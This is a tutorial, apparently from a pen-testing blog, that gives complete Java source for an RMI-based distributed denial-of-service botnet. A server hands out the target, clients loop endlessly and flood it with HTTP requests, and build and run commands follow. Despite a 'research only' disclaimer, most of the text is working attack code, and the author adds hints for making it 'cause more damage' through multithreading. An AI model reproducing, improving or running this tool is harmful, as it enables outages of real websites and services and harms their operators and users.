People hear in the news everyday that some website was attacked using DOS, well DOS is not Disk Operating System it is much bigger it can bring an entire website down even it has huge scale servers.
Here I would like to share a basic program using RMI based bots that will be helpful for research purpose only. My intention is not to encourage script kiddies but just to give an idea of some of the things that can be achieved using RMI in JAVA.
First we have created an interface that will be concreted in it’s implementation later. But, the main purpose behind creating this interface is just for RMI as the look up functionality of RMI needs an interface instead of complete implementation.
Later I have Imported the necessary imports to make the implementations of the interface
“Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you”
import java.rmi.*;
// DDOSService Interface
// Interface for a RMI service that will actually attack on a target machine
public interface DDOSService extends java.rmi.Remote
{
public String attack ( )
throws RemoteException;
}
Now this time is just to provide an implementation of that interface:
The UnicastremoteObject is to implement the remote server in the clinets and servers system hence the attack is a ddos, I have also inherited the interface DDOSService in the previous code snippet which in turns it inherits the Remote package.
Followed by it we create a server Instance in order to start the attack we are shooting the server with a http request we throw a exception if there is error in the code or a priority is out of number.
import java.math.*;
import java.rmi.*;
import java.rmi.server.*;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.net.Socket;
import java.net.UnknownHostException;
//
// DDOSServiceServer
//
// Server for a RMI service that calculates powers
//
public class DDOSServiceServer extends UnicastRemoteObject implements Runnable, DDOSService
{ //Target Machine
final String TARGET = "will-pc";
static DDOSServiceServer _instance;
public DDOSServiceServer () throws RemoteException
{
super();
}
// Calculate the square of a number
public String attack( )
throws RemoteException
{
_instance = new DDOSServiceServer ();
//2 threads on each machine
for (int i = 0; i < 2; i++)
new Thread(_instance).start();
String attack;
attack = "Attacking:"+ TARGET ;
return attack;
}
public void run() {
//1000 HTTP Requests using each client you can send more requests too
for (int i = 1; i < 1000; i++) {
try {
Socket net = new Socket(TARGET, 80); // connects the Socket to the TARGET port 80.
sendRawLine("GET / HTTP/1.1", net); // Sends the GET / OutputStream
sendRawLine("Host: " + TARGET, net); // Sends Host: to the OutputStream
System.out.println("Attacking on Target "+TARGET+" with Connection #: " + i);
} catch (UnknownHostException e) {
System.out.println("DDoS.run: " + e);
} catch (IOException e) {
System.out.println("DDoS.run: " + e);
}
}
}
public static void main ( String args[] ) throws Exception
{
// Assign a security manager, in the event that dynamic
// classes are loaded
// Create an instance of our power service server ...
DDOSServiceServer svr = new DDOSServiceServer();
// ... and bind it with the RMI Registry
Naming.bind ("DDOSService", svr);
System.out.println ("Service bound....");
}
public static void sendRawLine(String text, Socket sock) {
try {
BufferedWriter out = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream()));
out.write(text + " ");
out.flush();
} catch (IOException ex) {
ex.printStackTrace();
}
}
}
Till now we have almost done with our Server side code which we will be executing at our control panel machine from where we will be able to provide service to all those clients that will be waiting for our command. Actually here we have used RMI in reverse order as the clients are just acquiring the name of target machine from server. And once they got the name they start hitting it from their own machines.
As this code is just a day effort so probably need some further improvement too.
Now finally, we are at a stage to write the client side code that will be performing the actual task of sending fake requests to the client.
But in RMI we just need to compile in a bit different way. As it’s related to client-server communication so we must need a stub that will be used as a communication bridge in between client and a server.
Once we are done with the server we need to work on the client side hence it is a DDOS (Distrubuted Denial of the Service attack) we generate exceptions in the case of connectivity issues otherwise there is an infinite loop that hits the server we can make it better by using Multi-Threading it will cause more damage hey,I am not the one showing that to you but I will give you a
Hint : Inherit the Thread Class from another class and make the shift the entire code to a method in the Thread class and now you know what to do or
refer this article.
import java.rmi.*;
import java.rmi.Naming;
import java.io.*;
//
// DDOSServiceClient
//
public class DDOSServiceClient
{
String attack =""; public static void main(String args[]) throws Exception
{
DDOSServiceClient obj = new DDOSServiceClient() ;
while(true){
obj.attack ="";
try{
obj.go();
}
catch(java.rmi.ConnectException rc){
System.out.println("Connection Failure");
}
catch(java.net.ConnectException rc){
System.out.println("Net Failure");
} catch(java.rmi.NotBoundException je){
System.out.println("java.rmi.NotBoundException");
} System.out.println(obj.attack);
}
}
private static void go() throws Exception{
// Call registry for DDOSService
DDOSServiceClient obj = new DDOSServiceClient() ;
Thread.sleep(5000);
//A server IP that need to be replaced with this IP
DDOSService service = (DDOSService) Naming.lookup
("rmi://192.168.55.44/DDOSService");
DataInputStream din = new
DataInputStream (System.in);
//Calling remote Method
obj.attack = service.attack();
}
}
When we are already done with the coding. So, now we need to compile and test it.
javac DDOSServiceClient.java
javac DDOSServiceServer.java
rmic DDOSServiceServer
start rmiregistry
java DDOSServiceServer on server machine
java DDOSServiceClient on client machine.
Take your time to comment on this article
